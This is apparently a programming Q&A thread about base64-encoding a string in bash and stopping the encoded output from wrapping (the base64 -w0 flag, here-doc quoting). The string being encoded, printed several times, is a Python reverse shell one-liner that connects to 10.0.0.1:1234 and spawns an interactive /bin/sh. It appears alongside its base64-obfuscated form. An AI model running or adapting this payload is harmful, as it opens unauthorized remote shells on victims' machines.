# How to escape quotes in base64 encoded string in bash?

Tags: bash, base64

So I'm trying to base64 encode a string containing a python one liner program.

How could one escape whatever is splitting up the base64 encoded string into multiple lines? I'm assuming it's the quotes. " ' "

This is what I've tried:

```py
    echo "python -c 'import socket,subprocess,os; 
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); 
    s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); 
    os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); 
    p=subprocess.call(["/bin/sh","-i"]);'" | base64
```

It outputs:

```
cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7IHM9c29ja2V0LnNvY2tldChz 
b2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgcy5jb25uZWN0KCgxMC4wLjAuMSwx 
MjM0KSk7IG9zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5k 
dXAyKHMuZmlsZW5vKCksMik7IHA9c3VicHJvY2Vzcy5jYWxsKFsvYmluL3NoLC1pXSk7Jwo=
```

Comment: You need to escape the double quotes used in the call to `subprocess.call`, as the opening quote prematurely closes the quote in the argument to `echo`.

Comment: echo  "python -c 'import socket,subprocess,os
; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(('10.0.0.1',1234)); 
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([
'/bin/sh','-i']);'" | base64........ outputs the same result

Answer (score 1):

> whatever is splitting up the base64 encoded string into multiple lines?

Linebreaks are inserted based on the output length and *not* based on special symbols in the input. See `man base64`:

> `-w, --wrap=COLS
>   wrap encoded lines after COLS character (default 76).  Use 0 to disable line wrapping`

Therefore you can write `echo someString | base64 -w0`.

Please note that `bash` may mangle your string if you don't quote it correctly. In your case the `"` in `subprocess.call(["/bin/sh","-i"])` are swallowed by `bash` and *not* printed by `echo`. Either write `\"` or use a here-doc:

```
base64 -w0 <<'EOF'
python -c 'import socket,subprocess,os; 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); 
s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); 
p=subprocess.call(["/bin/sh","-i"]);'
EOF
```

Comment: Is it possible to pipe the output to a file like "string > file.txt" ? or store into a variable maybe?

Comment: Yes. The syntax is `base64 -w0 <<'EOF' > outputFile` or `base64 -w0 <<'EOF' | otherCommand` and in the next lines the rest of the here-doc. To store the result in a variable use `var=$(base64 -w0 <<'EOF'`¶ rest of the here-doc¶ `EOF`¶ `)`. Replace the »¶« with actual line breaks.

Comment: I see by line breaks you mean actual line breaks sorry for the confusion. Thanks!

Comment: What about decoding the string using bash ?